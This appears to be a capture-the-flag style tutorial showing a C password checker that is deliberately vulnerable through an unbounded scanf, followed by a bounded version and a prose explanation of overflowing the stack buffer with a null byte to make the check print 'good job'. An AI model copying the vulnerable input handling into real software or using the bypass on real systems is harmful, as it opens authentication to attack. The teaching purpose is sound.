#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void) {
char passwd[16] = ""; // array to store the username
char password[16] = ""; // array to store the password
FILE *fp = fopen(".passwd", "r");
fread(passwd, 1, 15, fp);
fclose(fp);
passwd[15] = '\0';
printf("Enter the password: ");
scanf("%s", password); // read the password from the user
if (strcmp(password, passwd) == 0) {
printf("good job\n");
} else {
printf("permission denied\n");
}
return 0;
}
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void) {
char passwd[16] = ""; // array to store the username
char password[16] = ""; // array to store the password
FILE *fp = fopen(".passwd", "r");
fread(passwd, 1, 15, fp);
fclose(fp);
passwd[15] = '\0';
printf("Enter the password: ");
scanf("%15s", password); // read the password from the user
if (strcmp(password, passwd) == 0) {
printf("good job\n");
} else {
printf("permission denied\n");
}
return 0;
}
The objectif is to dectect the buffer overflow and exploit it to print "good job".
Exploitation
This program is vulnerable to Buffer Overflow. In this case, the password array has a size of 16 characters, but the program does not check the length of the input entered by the user. This means that if the user enters a password that is longer than 15 characters, it will overwrite adjacent memory locations.
As explained in the "operation of the stack" part, variables are stored into the stack in the same order that they are declared :
Here, password and passwd reserved memory onto the stack have the same value ( 16* 0x41 ) but this doesn't pass the if condition. This appears because although memory space is reserved for the variable, when reading a string, the end is defined by the 0x00 byte. So, until this byte is not present, the process continues to read memory, even beyond the initially reserved space for the variable. Thus, password = 32 * 0x41 and passwd = 16 * 0x41
In order to pass the if condition, password and passwd need to hjave the same value, to do that, it's needed to inject a null byte in the input.